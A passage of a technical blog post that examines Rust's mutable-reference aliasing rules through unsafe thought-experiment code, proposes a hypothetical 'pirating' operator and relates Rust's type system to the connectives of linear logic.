card game, and they had two copies of a card that would have been really useful
in their situation, but unfortunately the rules of the game said that a player
could only play the card in question once per turn. Another spectator said,
sarcastically, that the reason that they couldn't play both is because they
weren't trying hard enough. That line has really stuck with me, and somehow it
seems relevant here.
In Rust, you "can't" copy a mutable reference (except with a reborrow, which
prevents the two copies being used concurrently). But maybe that just means
that I wasn't trying hard enough, and I should do it myself:
fn main() {
    let mut a = 5i32;
    let b = &mut a;
    // SAFETY:
    // It is better to remain silent and be thought a fool,
    // than to speak and remove all doubt.
    let c = unsafe { core::ptr::read(&raw const b) };
    println!("{}", *b);
    println!("{}", *c);
}
This seemed promising: if Rust won't copy the reference, why don't I just look
at the bits of memory that represent it and form them into a new reference?
Unfortunately, despite this code outright stating that the reference should be
copied, and compiling, it doesn't actually copy the reference.
The reason behind this should be familiar to people who have used any
memory-unsafe language, such as C, C++, or unsafe Rust: this program has
undefined behaviour. Memory-unsafe languages have various rules that you have to
follow in order for the program to have any meaning at all; and a program that
contains undefined behaviour is meaningless and might do anything, including
skipping the offending code entirely (an outcome that actually happens quite
frequently in practice). As such, the code can't meaningfully be said to copy
the reference because there is no requirement that the Rust compiler compiles
the code into anything resembling the original program, and the code it actually
produces might therefore not contain the copy. (The standard analogy, dating
back many decades now, is that it is perfectly valid to implement undefined
behaviour by making demons come out of your nose. That's why I didn't test this
program on my own computer, but rather on the Rust playground, in the hope that
if demons were summoned, it would be in some distant data centre that could
contain them more easily.)
Still, if you give up after just one failure, you probably weren't trying hard
enough. I'm just going to have to try even harder:
fn main() {
    let mut a = 5i32;
    let b = &mut a;
    // SAFETY: ???
    let mut c = &mut 0; // placeholder, immediately overwritten
    unsafe {
        core::ptr::copy(&raw const b, &raw mut c, 1);
    };
    println!("{}", *b);
    println!("{}", *c);
}
Yes, I know the program looks basically identical to the last one: instead of
copying the bits out of a mutable reference and forming them into a new mutable reference, I instead copied the bits out of a mutable reference and used them to overwrite an existing mutable reference. But if you run it in Miri, a
Rust interpreter that detects undefined behaviour, something magical (and
somewhat surprising) happens: it runs the program successfully and reports no
undefined behaviour along the way.
This is one of the most subtle areas of Rust, to the extent that I recently
bug-reported a similar situation before learning that it was intended behaviour
rather than a bug (and I wasn't the only person making that sort of mistake). I
think I understand what's happening now, though, and will start with an analogy
from C.
Let's write some C code that prints the value of the PATH environment variable:
puts(getenv("PATH"));
The question I'd like to consider is: is this code thread-safe?
This is a bit more subtle than might be expected, but there's a good explanation in the glibc manual (see the section about "env"). The basic issue is this: C's getenv function is usually implemented as returning a pointer into the inside of a global variable environ. That pointer is only guaranteed to remain valid as long as nobody changes environ; if it is changed by another thread, the returned value might get overwritten while we're using it and that could potentially lead to undefined behaviour, e.g. due to a buffer over-read (you might read the value after elements have been added to it but before the sentinel to say where the elements end has been written, and thus read too much) or due to accessing deallocated memory. Despite all this, getenv is typically considered safe: the reason is that changing environ (e.g. via setenv) is considered to be unsound unless you can prove that no other threads are using environ at the time. In other words, we have a combination of two things (getenv and setenv) that are unsound to use in combination, and one of them is considered safe, with the other being considered unsafe. (This subtlety led to one of the only cases in Rust's history where a standard library function was previously marked as safe, but a breaking change was made to mark it unsafe: std::env::set_var, Rust's equivalent of setenv, became unsafe because it might break C code using getenv that ran in parallel (even though it was correctly guarded against running in parallel with the Rust equivalent).)
This is a demonstration of the fact that there are two ways in which code can lead to undefined behaviour: either it directly does something that the compiler/runtime/OS/processor assumes is impossible (potentially causing arbitrary breakage when the assumption is used to guide optimisations and they go off the rails), or else it does something that other code is allowed to assume is impossible. If I call setenv in a multi-threaded program, that might lead to undefined behaviour because some other code, perhaps in a library, might assume that it can safely call getenv at the same time. If I call setenv and can ensure that nobody is calling getenv at the same time, that isn't undefined behaviour and the program will work correctly. So there are two shades of "code you aren't allowed to write" here: either 1) the code directly does something that's undefined and can't possibly be allowed in a valid program, causing it to instantly become meaningless; or 2) the code breaks some invariants that other code is allowed to assume will hold, and is sound only if you can ensure that no code which makes that assumption will run while the assumption is false.
So, what about the example above? In general, Rust code is allowed to assume
that two concurrently usable mutable references won't alias. For example,
ptr::read assumes that its return value doesn't alias any mutable reference that the caller is using (indeed, Rust functions in general do that).
Rust code is allowed to assume that two concurrently usable mutable references won't alias… but the compiler doesn't.
Here's a great demonstration. Suppose we compile these two Rust functions, in
release mode:
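Something like this pair is consistent with the codegen described below (a reconstruction, so the exact bodies are an assumption):

fn f1(a: &mut i32, b: &mut i32) {
    *a = 1;
    *b = 2;
    *a += 2;
}

fn f2(a: &mut &mut i32, b: &mut &mut i32) {
    **a = 1;
    **b = 2;
    **a += 2;
}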
In the present version of Rust, the generated machine code for f1 works like this: store 2 in *b; and store 3 in *a. This optimisation is valid because mutable references in function arguments can't alias each other, which is an assumption that the compiler is allowed to make.
In the present version of Rust, the generated machine code for f2 works like this: calculate what address **a points to and store 1 in it; store 2 in **b; then add 2 to the calculated **a address.
With f1, the compiler has made use of knowledge that a and b can't alias with each other. The compiler makes an assumption that mutable references that are function arguments cannot alias each other, and violating this assumption is immediate undefined behaviour.
With f2, the compiler hasn't made use of knowledge that *a and *b can't alias each other, because at least under the current draft of the aliasing rules, that isn't an actual rule of Rust. There are lots of things that you can't do with aliasing mutable references, but apparently this isn't one of them (and returning a reference via writing into memory provided by the caller isn't either, which is what makes the ptr::copy program meaningfully different from the ptr::read program). You can even (if you mark b as mut) add a call to f2(&mut b, &mut c) into the ptr::copy program above, and get an output of two 4s, even in release mode and even under Miri.
Now, I wouldn't recommend ever doing anything like this for any purpose other
than thought experiments. The rules behind this sort of thing a) are very
subtle and hard to understand, b) can cause arbitrarily bad malfunctions at
runtime, in a way that the compiler can't catch and testing may not be able to
catch either, and c) are subject to change, potentially in ways that break
programs that were previously working. If the Rust developers decided that it
was safe to break the code in this section (i.e. that they wouldn't break too
much existing unsafe code in the process), I would be upset that my blog post
was out of date, but happy at the new optimisation opportunities and at the
rules becoming easier to understand.
But in the hypothetical world of thought experiments, in which Rust ended up
being implemented without shared references for some reason, every Rust
programmer would have been writing code like this, and the developers would
ensure that they didn't break all the existing code.
Instead, we'd get one of two scenarios. One is that nobody would use the
alternate-world Rust because it would be even more dangerous than C, and thus
lose most of its reason for existence. And the other, more intriguing, scenario
is that someone would have come up with a framework for making this sort of
thing safe.
A Rust with piracy instead of sharing
In this hypothetical version of Rust, programmers would have: a) mutable
references (which exist in the real version of Rust too), b) a way to copy
things that aren't supposed to be copied (probably with better syntax, as this
would be very widely used to do things that would otherwise need the nonexistent
shared references), and c) some notation that could be used at least in types,
in order to distinguish illegal copies of objects from objects that hadn't been
illegally copied (some operations only work on the latter, so they need to be
distinguished from the former in order to prove those operations safe).
c) puts me in the situation of creating a new language feature, again, even
though this time it's just for a parallel-world hypothetical language for a
thought experiment. I don't have any really good ideas for syntax, so I'll
deploy another lesson that's been learned about experimenting with new language
features: if you don't have a good syntax available, choose an obviously
terrible one in order to prevent a bad placeholder name sticking. (Experimental
Rust APIs have ended up with names like Yeet or BikeshedIntrinsicFrom based on this principle, although Yeet may not have been bad enough because apparently some people want to keep it.)
As such, my new notation, for experimental purposes, is going to be a prefix ? that marks "illegal copy" types: for example, an illegally copied &'a mut T would be ?&'a mut T. This also suggests that prefix ? would be the operator for copying uncopiable things in the first place:
fn main() {
    let mut a = 5i32;
    let b = &mut a;
    let c = ?b;
    println!("{}", *b);
    println!("{}", *c);
}
I think of the ? operation as "pirating", because it copies something that, according to the rules, you aren't allowed to copy. Note that after the let c = ?b; line, both b and c are effectively a ?&mut i32: the original and copy are copies of each other, so they each have to take the existence of the other into account.
Thinking about the pirating operation in general (not just as it applies to mutable references), it seems to be about "halfway" to creating a shared reference. For example, pirated values are Copy (they've already been illegally copied once, copying them again isn't going to make the situation worse), can be used to read the original value in most cases, and can be used as a function argument without consuming the original value. On the other hand, they're the same size as the original value (rather than being pointer-sized like references are), can't be used to determine the value's address, and are unable to write inside a Cell (whereas a shared reference is able to do that); all those changes stem from the pirated values being implemented as a copy of the original value rather than a reference to it.
This may give you a suspicion (at least, it gave me one): if we pirate a mutable reference, doesn't the result end up being a shared reference? Pirating a value directly means that the address is lost and the size is preserved, but if you pirate a mutable reference, the address is copied and you end up with something the size of a reference. The only remaining requirement would be to check that the things that can soundly be done with `?&'a mut T` are the same things that can soundly be done with normal Rust's `&'a T`, but they certainly seem pretty similar (e.g. you can't write through it because it might be aliased in another thread, except if it's a single-threaded program and then you can write through it but can't take a mutable reference through it, etc.).
This is interesting because it suggests a model for the mutable-to-shared transformation that I was looking for originally. In particular, it specifies what to do about the type definitions (you just pirate the type, which is equivalent to pirating all the fields, which is equivalent (except for `PhantomData` weirdness) to pirating all the non-`Copy` fields, because copying a `Copy` field isn't illegal). That means that I can check it against the reference implementations I actually wrote and discover that… it's almost right. There's nearly an exact match, except that some of these shared references have lifetimes when the equivalent mutable references don't.
And thinking about it, there's a reason for that. The mismatch happens in cases where the mutable reference has a destructor. Say we pirate one of those: then the destructor won't be able to run safely, because it might unlock something that the pirated version is assuming will stay locked. The only way to make the code safe is to get rid of all the pirated copies before the destructor runs: and in Rust, the way to ensure that an object is gone before you do an action is to give the object a lifetime. It turns out to be fairly easy to implement this behaviour into the pirating operator `?`: you just give it a lifetime when applying it to types, along the lines of `?'a &'a mut T`, and when the lifetime is over, the borrowed object is considered to be unpirated again because it now has no copies to alias it. (At the value level, rather than the type level, the lifetime behaviour is identical to how a shared reference would behave.) After making that change to the plans for `?`, the references now match, either exactly or in a "different implementation that gives the same result" sort of way.
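You can already see the analogous behaviour in current Rust, by reborrowing a mutable reference as a shared one (a minimal sketch in real Rust, with the shared reborrow standing in for the hypothetical `?` operator):

```rust
fn main() {
    let mut x = 5i32;
    let b = &mut x;
    // Reborrowing b shared is the closest real-Rust analogue of pirating it:
    let c: &i32 = &*b;
    let d = c; // the copies are freely duplicable
    println!("{} {} {}", *b, *c, *d); // shared reads are fine
    // c and d are dead from here on, so the "pirated" lifetime is over...
    *b = 6; // ...and b is usable for writing again
    println!("{}", *b);
}
```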
So it looks like implementing all those references has been a fruitful
experiment in two different ways: a) the implementation should help to give
insights into scoped generics, but b) the implementation also shed light on how
to generate shared-reference code from the mutable-reference version. This is
almost certainly the correct way to transform types. But what does the same
transformation on functions and methods look like? I have some examples and
know what the transformation "feels like", but it would be nice to have
something that's provably correct or at least has some established theory behind
it.
At this point, I'm not sure what someone without a PhD in substructural type
system theory would do. Fortunately, I happened to have the correct background
for solving this particular problem, and spent several hours trying to figure
out whether there was some existing mathematical theory that covered this: first
from memory, then searching through Haskell documentation for types with the
right shape or related-sounding names, then asking friends online. (Haskell is
a great place to check for this sort of thing: no matter what weird
type-system-related thing you're looking for, there's a very good chance that
someone implemented it for Haskell first.) All this effectively had the same
result as talking to a rubber duck would (i.e. the replies were useful only to
rule things out, but it helped streamline my own thoughts to the extent that I
could figure it out on my own), and I eventually started thinking along the
correct lines to discover something very interesting indeed.
Linear logic
<ais523> actually, linear logic probably has an operation for this
somewhere, it has lots of operations like that
— me, suddenly realising that I had been trying to use the wrong branch of
mathematics
Let's take a step back for a moment, to think about programming language type
systems. It was observed, several decades ago now, that programming language
type systems seemed to follow the same rules as systems of logic did (this is
normally known as the "Curry–Howard correspondence").
As a simple example: in logic, if A implies B and B implies C, then A implies C;
and in programming, if you have a function that takes an A and returns a B, and
a function that takes a B and returns a C, you can combine them into a function
that takes an A and returns a C. In general, types in programming languages
tend to follow the same sort of rules as predicates in logic, and programs tend
to follow the same sort of rules as proofs. At least to me, it isn't clear
whether or not this is a coincidence, but because the rules are the same, it
lets you take results from one field and reinterpret them to learn things about
the other (and doing this is valid regardless of whether or not there's a
"reason" for the rules being the same).
There are plenty of different models of logic in philosophy, each of which has
slightly different rules: and most of them make some sort of sense when
interpreted as frameworks for designing programming language type systems, but
the difference in the rules gives you languages of a different general nature.
One thing that many models of logic have in common is that if you have a list of
premises that you're trying to prove something with, you're allowed to use the
premises multiple times, or not at all, or in an arbitrary order. For example,
given an assumption that statements P and Q and R are all true, it's possible to
prove that (P and Q) and (Q and R) in logical systems that try to reflect the
real-world notion of truth, even though that means you have to use your
assumption that Q is true twice. But it's possible to imagine a logic where
some of those rules are removed (this is known as a "substructural" logic). For
example, if premises aren't allowed to be used more than once ("affine" logic),
you end up with a logic in which the truth of the premises gets "used up" as you try to prove things with them, making them useless for proving other things.
Affine logic doesn't seem like a good model for truth and falsity (because it
isn't: in real life, true statements don't stop being true just because you
prove things with them). But its rules are pretty good at modelling other
things, like manufacturing things from resources: the construct which normal
logic would call "P implies Q" can be interpreted in affine logic as "you can
use a P to make a Q". And when viewed as a type system, the resulting effect on
the language is quite interesting: the same construct becomes "the type of a
function from P to Q", but implies that P isn't usable after the call (because
you don't get to use it as an argument for a different function afterwards).
One possible cause of that is that "P was moved into the function", leaving it
unavailable to the caller. At present, there's only one widely used programming
language where functions work like that by default: but it's the language that
this blog post happens to be about. Rust is generally considered to have an
affine type system, under the view of the arguments being moved into the
function and unavailable to the caller.
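A quick illustration of the affine reading, using nothing but today's standard move semantics:

```rust
fn consume(s: String) -> usize { s.len() }

fn main() {
    let s = String::from("premise");
    let n = consume(s); // s is moved: the "premise" is used up
    // println!("{}", s); // error[E0382]: borrow of moved value: `s`
    println!("{}", n);
}
```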
There are, however, other possible views of affine type systems. I was doing my PhD at around the time that Rust was being invented, and I was using an affine type system too (which I like to think gave me a head start on understanding Rust): but in my case, I was working with an implementation of a language (SCI, "Syntactic Control of Interference") that compiled it directly into hardware and which was therefore able to do things in parallel very cheaply. However, this carried the usual risks of thread-safety issues that come with running code in parallel, and SCI wanted to avoid those. SCI's solution was to use an affine type system, considering things that create new threads to "consume" the resources used in those threads (which includes both hardware resources like multiplier circuits, and data resources like particular memory cells), preventing them being used by other threads. On the other hand, if two blocks of code ran sequentially, they would be allowed to share resources.
The difference between these two cases was implemented using something called "connectives". In classical logic, the connectives are things like "and", "or", "not". In substructural logics, you have more connectives: each of them is generally similar to a classical logical connective, but more specific about the exact way that resources are shared. SCI had different types for the "run in parallel" and "run in sequence" operators: when running in parallel, resources couldn't be shared between the threads, but when running in series they could be, and that was represented by combining the types of the arguments using different connectives. Both commands took "a command and a command" as their argument, but "run in parallel" used a version of "and" where the commands were not allowed to share resources, whereas "run in series" used a version of "and" without that safety requirement; so the language was able to emulate two different connectives that would both translate to "and" in classical logic.
"Linear logic" is a substructural logic that, just like affine logic, disallows
using the same premise twice, but which is also notable for having a fairly
large set of connectives. Most of the time that it's used in type theory, it's
used as a tool for creating type systems by picking only the connectives you
need for your language and disregarding the rest: some of them are fairly
obscure, to the extent that the week before I started writing this blog post,
I'd never used them and didn't even really understand what they meant. As such,
when viewed as a type theory, it's more like a framework for developing type
theories than it is a useful type theory in its own right.
But, as it turns out, Rust was already using a fairly large portion of it, and
when modelling the pirating operator, I needed even more. So I'm going to go
over the six "main" connectives in this blog post (known as the "additives,
multiplicatives and exponentials") and try to explain how they relate to Rust.
Understanding the more commonly-used linear logic connectives
I'm going to go through the linear logic connectives in order from easiest to hardest to understand. As such, I'm going to start with ⊗. Combining two things with ⊗ basically means that you get both, and can use both: in Rust, this is a `struct` or tuple, which has multiple fields and you can move out of all of them. For example, in linear logic, you would model the Rust type `(i32, u32)` as i32 ⊗ u32, and a struct with an `i32` field and a `u32` field would be modelled the same way (because it isn't really significantly different from a type theory point of view: you can do the same things with it). A good way to think about T ⊗ U is that to produce it, you must produce a T and a U, and when consuming it, the consumer gets a T and a U: simple enough.
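In Rust terms (a minimal sketch), consuming a T ⊗ U really does hand the consumer both halves, even when neither is copyable:

```rust
fn main() {
    let pair: (String, Vec<u8>) = (String::from("left"), vec![1, 2, 3]);
    // Consuming the ⊗: the consumer gets both the String and the Vec,
    // by value, and can move out of both fields.
    let (s, v) = pair;
    println!("{} {:?}", s, v);
}
```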
Rust's two main tools for creating arbitrary data structures are `struct`s and `enum`s, and it isn't surprising that linear logic has a connective for `enum`s, too. ⊕ is the construct called `enum` in Rust, "tagged union" in language-agnostic programming discussions, and "disjoint union" in mathematics: it represents a value that could have either of two types, and tracks which. For example, linear logic would model `Result<T, U>` as T ⊕ U. To produce a T ⊕ U, you only need to be able to produce a T or a U; and when consuming one, the consumer must consume the T or the U, whichever one the producer produced. However, the consumer gets to share resources between the two possible cases: if (say) it needs to access the same piece of memory to process a T as it does to process a U, it can check to see whether it has a T or a U before deciding what to use the memory for, so the program is still sound.
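That resource-sharing point is visible in ordinary Rust: both arms of a match can capture the same exclusive resource, because only one arm ever runs. A small sketch:

```rust
fn main() {
    let mut log = Vec::new();
    let r: Result<&str, i32> = Err(404);
    // Both arms mutably use `log`; that's fine, since only one arm runs.
    match r {
        Ok(s) => log.push(format!("ok: {}", s)),
        Err(code) => log.push(format!("err: {}", code)),
    }
    println!("{:?}", log);
}
```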
The next-simplest connective is &, which represents a single object that can be viewed as having either of two types. In Rust, this situation occurs with trait implementations: a `Vec` is a `Vec`, but it's also an `impl Debug`, and it's also an `impl IntoIterator`, and it implements plenty of other traits too. Linear logic represents this situation using &: a T & U is a single value that can be viewed as either a T or a U, so to produce a T & U, the producer has to be able to produce something that's both a T and a U, but when consuming one, the consumer only gets to consume it as a T or a U. (& is unlike ⊕, though, in that the consumer gets to choose which; with ⊕ it's the producer who chooses.)
It's worth noting at this point that linear logic is somewhat flexible with how it models "time passing" in a program. One common way to use it is to think of it as representing the types that are instantaneously available in a program: in SCI, the "commands to run in sequence" argument of the sequencing operator takes a command & command as its argument. Linear logic indicates that it should only be able to use one; but the correct interpretation (at least for SCI) is that it should only be able to use one at a time, but nothing prevents it running the other afterwards, because there's no point in time at which the state of the program is wrong. If you use the "at a time" view of linear logic to model Rust, it ends up modelling mutable borrows (because once you get the value back from a mutable borrow, you can use it for something else, so a T & U can be borrowed first as a T, and later as a U); if you use the "for all time" view instead, it models moves. There's probably some mathematical trick to get it to model both at once, but I don't know what it is.
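The "at a time" reading is easy to see in current Rust (a minimal sketch; the helper functions are mine): the same value is borrowed first through one view and later through another, and the sequencing is what makes the borrow checker happy.

```rust
use std::fmt::Debug;

fn use_as_debug(x: &mut impl Debug) { println!("{:?}", x); }
fn use_as_vec(x: &mut Vec<i32>) { for v in x.iter_mut() { *v += 1; } }

fn main() {
    let mut v = vec![1, 2, 3];
    use_as_debug(&mut v); // borrow it "as a Debug" first...
    use_as_vec(&mut v);   // ...and later "as a Vec": sequential use is fine
    println!("{:?}", v);
}
```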
The last connective I want to consider in this section is !, an "exponential" that applies to just a single type. In linear logic, !T is equivalent to 1 & T & (T ⊗ T) & (T ⊗ T ⊗ T) & … with any number of Ts (where 1 is an empty tuple, Rust's `()`); it can be viewed as an inexhaustible supply of Ts. From the Rust point of view, this doesn't make much sense as an operation to apply to arbitrary types T. However, the aim is to use linear logic to model Rust, not Rust to model linear logic, and there's a clear purpose for ! when modelling Rust: it's used to model `Copy` types. For example, `i32` could be represented as !NonCopyI32: if you have an `i32` you can easily generate more of it (by copying in Rust, or by converting !NonCopyI32 to !NonCopyI32 ⊗ !NonCopyI32 in linear logic).
Translating `Copy` types as ! of a non-`Copy` type is interesting because it teaches us something about Rust. Affine logic doesn't allow you to use values more than once, without some way to copy them; but linear logic additionally doesn't allow you to use values less than once, without some way to get rid of them. Rust is normally described as affine because you can get rid of any value using `mem::forget`, but I think that's misleading: in affine type systems you can just ignore a value and it vanishes without side effects, whereas in Rust you can only get rid of a value by dropping it, leaking it, or using an operation like `mem::forget` or `ManuallyDrop` to forget it. Forgetting has to be explicit; leaking leaves the object in existence from the type-system point of view, you just never access it again; and dropping is done implicitly, but can run custom code (and thus has to be treated from the type system point of view as though the call to `drop`/`drop_in_place` were written explicitly). So I think it's more accurate to view Rust's type system as "linear, but you have a range of options for dropping/forgetting things intentionally".
The interesting aspect here is that in linear type systems, a ! type is defined to be discardable even without explicitly using a function to get rid of it. For most types, the type system will ensure that values of the type are dropped when they leave memory, unless explicitly forgotten. For ! types, it doesn't: it allows the type to just vanish even without being dropped. And that implies a rule that Rust should have (and actually does have): a `Copy` type can't have a destructor. Part of the reason I wanted to look at the type theory behind pirating is that I was hoping for insights like this: if the type theory is modelling your types correctly, then following the logic will teach you things that should be possible or impossible in your language, and you can see whether they actually are. If they aren't, either you aren't modelling the types correctly, or you have a soundness hole or missing feature.
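That rule is directly checkable against the compiler:

```rust
#[derive(Clone, Copy)]
struct Token(u8);

// Uncommenting this Drop impl makes the Copy derive fail to compile with
// error[E0184]: the trait `Copy` cannot be implemented for this type;
// the type has a destructor
//
// impl Drop for Token {
//     fn drop(&mut self) {}
// }

fn main() {
    let t = Token(1);
    let u = t; // fine: Copy values may be duplicated or silently vanish
    println!("{} {}", t.0, u.0);
}
```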
In any case, that's four connectives covered out of the six I want to discuss, and (apart from the connective that represents function types) those are the only ones I've ever seen anyone use in practice. The remaining connectives are ⅋ and ?, and ? is fairly easy to define in terms of ⅋.

But understanding ⅋ is something of a nightmare, and easily the most complicated part of linear type theory (in the rare cases where you actually end up needing it). Linear logic is actually very internally symmetrical, with ⅋ filling a hole in a pattern: but it's a hole that might at first seem impossible to fill. Some connectives produce types that are easier to produce than others; and connectives that are easier to produce with are less useful for the consumer, who can do less with them. Ordering the four non-exponential connectives from easiest to consume to easiest to produce:

- T ⊗ U is produced by producing two objects, a T and a U, and the consumer gets to consume two objects, the T and the U;
- T & U is produced by producing one object that's both a T and a U, but the consumer has to choose whether to consume that one object as a T or a U;
- T ⊕ U is produced by producing a single object that's a T or a U, and the consumer has to consume that one object as a T or a U, whichever it happens to be; and
- to complete the pattern, T ⅋ U is produced by producing a T or a U but that somehow acts like two objects, and the consumer has to consume both objects, the T and the U.
Unlike the first three connectives, ⅋ seems impossible and nonsensical. When producing it, the producer is doing something apparently impossible (and yet this is easier for the producer, somehow, than ⊕, which appears to give the producer maximum flexibility in how to produce). When consuming it, you get two objects, but somehow that's harder for the consumer to handle (and less useful for producing things with) than getting only one.
I think I have a good intuition for what ⅋ is actually doing, now. But something
this strange is going to take a lot of explaining, so it's going to take me a
whole section to see if I can convey my intuition in a way that readers will
understand.
Understanding linear logic's ⅋ and ?
“I should like to buy an egg, please,” she said timidly. “How do you sell them?”
“Fivepence farthing for one—Twopence for two,” the Sheep replied.
“Then two are cheaper than one?” Alice said in a surprised tone, taking out her purse.
“Only you must eat them both, if you buy two,” said the Sheep.
— Lewis Carroll, Through the Looking-Glass
Let's start with a situation where ⅋ might actually come up. It's too contrived
to be likely to happen naturally, but hopefully it'll nonetheless be possible to
understand what's going on.
Suppose we find an experienced JavaScript programmer who doesn't know any Rust,
and ask them to design the interface for a Rust library for making web requests
(this is a high-level library: you specify the URL you want to fetch, and get
the contents of the web page back, or an error code). There are two problems in
designing this API: a) how to deal with the delay between making the request and
getting the response, and b) how to deal with the fact that the return value
could be either a string or an integer.
For a), Rust programmers might use `async`, or just block on the request, but the usual low-level primitive behind this sort of thing in JavaScript would be a callback: although it would normally be wrapped up into a promise in modern JavaScript, someone who didn't know the language they were working in would be likely to try the simple things first, so it's quite plausible that they'd come up with an API that uses a callback. For b), obviously the correct interface is a tagged union (a Rust `enum` – a Rust programmer would probably use `Result`), but someone who didn't know Rust might not know about that feature and might attempt to implement it manually.
So how do you implement a callback that conceptually takes an `enum` as argument, without using an actual `enum`? (looks up linear logic notes and observes that to consume a T ⊕ U you can use a T-consuming function & a U-consuming function) The correct approach for this is to define a trait with a method for each variant, so that you can determine which variant you had by which method gets called:
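Something along these lines, perhaps (a sketch with illustrative names, written as a bare signature in the same style as version 2 below):

```rust
// version 1: one method per variant; `self` is moved into whichever
// method actually gets called
trait HttpCallback {
    fn success(self, body: &str);
    fn failure(self, status: i32);
}

fn http_request(url: &str, callback: impl HttpCallback);
```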
However, someone who's unfamiliar with Rust would probably not use a trait, and after looking up the correct syntax for taking a function as an argument, might end up using a struct or tuple of two callbacks instead, or just ask for two separate callbacks as method arguments:

```rust
// version 2
fn http_request(url: &str,
                success_callback: impl FnOnce(&str),
                failure_callback: impl FnOnce(i32));
```
In version 1 of this API, `http_request` is effectively providing an &str ⊕ i32 to the callback, which is what we'd expect. But in version 2, it's providing an &str ⅋ i32.
Let's see what goes wrong from the point of view of creating the callbacks, first. A ⅋ type is less useful for the consumer than a ⊕ type, and here, that shows up when we try to borrow-check the callbacks. In version 1, there's no issue with having the success and failure callback methods both try to use the same fields of `self`: the whole `self` object gets moved into whichever callback method gets called, and so the method has full access to all of `self`. But in version 2, the success and failure callbacks are actual objects that exist at the same time as each other, so they can't contain conflicting borrows; for example, if both the success and failure callbacks want to write to some sort of controller object, they won't both be able to hold a mutable reference to it.
Is the borrow checker being unnecessarily restrictive here? A beginning Rust programmer might think so, but a more experienced Rust programmer will recognise that there's probably some valid hypothetical that the compiler is trying to guard against. And in this case, it's not too hard to spot the potential issue: nothing in version 2 of `http_request` actually specifies that only one of the callbacks gets called. A malicious `http_request` could call the success callback, or the failure callback, or the success callback and the failure callback, or maybe it calls them in the opposite order. If the callbacks used more complex argument types than `&str` and `i32`, it might find a way to pass the success callback as an argument to the failure callback, or vice versa, and trick the calling program into running one inside the other – and if either of them were `Send`, it could run them simultaneously on different threads.
So this is what a T ⅋ U is: it's an object that could be a T, or a U, or a T and a U that have to be safe to process together in some arbitrary way that might involve processing them in any sequence, or in parallel, or interleaving them, etc. The consumer can't tell which (unlike with ⊕, where it can tell which, and &, where it can choose which), and has to dedicate separate resources to the T and to the U just in case it ever gets given both (even if the producer only actually happens to generate one). In a way (that linear logic actually precisely defines!), ⅋ is the opposite of ⊗: a T ⊗ U can also be processed as a T, or a U, or a T then a U, or a U then a T, or both at the same time – but with ⊗, the consumer gets to choose which, whereas with ⅋ it's imposed by the producer.
⅋ might not seem very useful, and indeed I haven't found anything simple or useful in Rust that it corresponds to. But it can be used as a building block for something more interesting. Think about what happens when the linear logic connectives are used with both types the same:

- T ⊗ T is two Ts: you can consume them both, so it provides twice the resources a single T does;
- T & T is equivalent to just a single T (it's an object that can be consumed as either a T or a T, and the choice doesn't matter);
- T ⊕ T is effectively a T plus a boolean (because you can tell whether it was a "left T" or a "right T");
- and T ⅋ T is like a T, but has to be safe to process in parallel with another T (even if that doesn't actually happen), so you need a second copy of all the resources you might use to process it.
OK, so it's hard to see how a T ⅋ T a) could get created, or b) would be useful even if it did. So let's go further: what about a T ⅋ T ⅋ T, or a T ⅋ T ⅋ T ⅋ T? What about the limit: imagine a type that could be any number of Ts, ⅋ed together. This would be T ⊕ (T ⅋ T) ⊕ (T ⅋ T ⅋ T) ⊕ …, which linear logic has a name for: it's ?T, where ? is the sixth and final connective that I want to discuss in this blog post.
Let's think about what a ?T actually is. It's sort-of like a T, but consumers are very restricted in what they can do when processing it: anything they do has to be valid even if arbitrarily many copies of the same consumer were trying to do the same thing before, after, or during the processing of the ?T ("same consumer" because you have to potentially be able to process arbitrarily many Ts but only have finitely many different consumers, so some of them will be the same). They can't borrow anything mutably, because anything they do might be done any number of times, and even twice wouldn't pass the borrow checker. That also means that they can't use a mutable reference to prove that they have unique access to memory: anything they try to write to might potentially be aliased.
Once you've finished consuming, any result you produce is also a ? type. The reason is that the original producer of the ? type gets to choose how many times it might need to be processed and which of the results end up mattering, so if you process a ? type and return a value, you don't actually know the structure of that value: just that it's some number of copies of the return value, and you don't know which ones are valid or what sequence they ran in, so the best you can do is produce a ? of the result type.
Writing while holding a ?T isn't outright impossible, but you can't rely on the borrow checker to tell you that it's safe: you'd need some other sort of proof, like "this thing isn't `Send` so I know it's only being accessed from a single thread" or "there's a lock around this object in order to protect it from concurrent modifications". The same rules for writing apply to shared references (the types that let shared references get around the restrictions are `Cell` and `Mutex` respectively), which should be enough to raise more than a little suspicion.
What linear logic teaches us about pirating
All of this leads up to my big surprising discovery: even though Rust doesn't (as far as I know) have anything that's modelled by ⅋, it does seem to have something that's modelled by ?. In particular, the linear-logic-defined type ?T seems to be acting an awful lot like a pirated type `?T`. Thinking about it, this makes a lot of sense: pirating a type effectively says "there may be extra copies of this that aren't supposed to exist", and ? effectively says "this value can only be handled in ways that are safe even if you have to allow for the potential that extra copies of it exist and are being operated on".
To verify the theory, we just need to look at what ? is supposed to be able to do and verify that Rust can do the same. The main interesting rule of ? in linear logic is that if something can operate on a T using only resources which have ! type, then it can also operate on a ?T (producing a ? of the result). In Rust, that translates to "a closure that is `Copy` can operate on a pirated version of its argument to produce a pirated version of its result".
Unfortunately, this seems obviously wrong. Rust has some very simple closures like `|x: &mut i32| *x = 10` which are `Copy` and return `()` (which is safely piratable due to also being `Copy`), and yet would be unsound if you pirated the argument in order to make it into a shared rather than mutable reference.
The mismatch comes down to what the assignment operator `=` is doing: in order to know that it can do the write safely, it is making an "argument from uniqueness" using the uniqueness of the mutable reference that it's writing to. When given a pirated mutable reference (i.e. a shared reference) instead, the uniqueness proof needs to come from somewhere else: but such a proof would (obviously) not be `Copy`, because then it would be able to prove to two different closures that they both had unique access. So the correct conclusion is "a closure that is `Copy` can operate on a pirated version of its argument to produce a pirated version of its result, as long as it does not make an argument from uniqueness" (or, at least, if it wants to make such an argument, it has to somehow obtain a non-pirated uniqueness proof despite being `Copy`). This reasoning somewhat suggests that arguments from uniqueness should be a type-system-level concept, given that they show up in the logic and influence it.
If this is a type-system-level concept, it should be possible to find it in the type system! And indeed, there are a couple of places that I've seen it before. One of them is in my previous blog post, which ended up implementing `Cell` in safe Rust using scoped generics. It did that by using a scoped generic that represented the permission to access `Cell`s: while you were operating inside a `Cell`, you didn't have the permission and thus couldn't form a new reference to the inside of a `Cell` while you already had one. This is a sort of argument from uniqueness, but one that's visible as a concrete object in the type system (which I'll call a "cell permission").
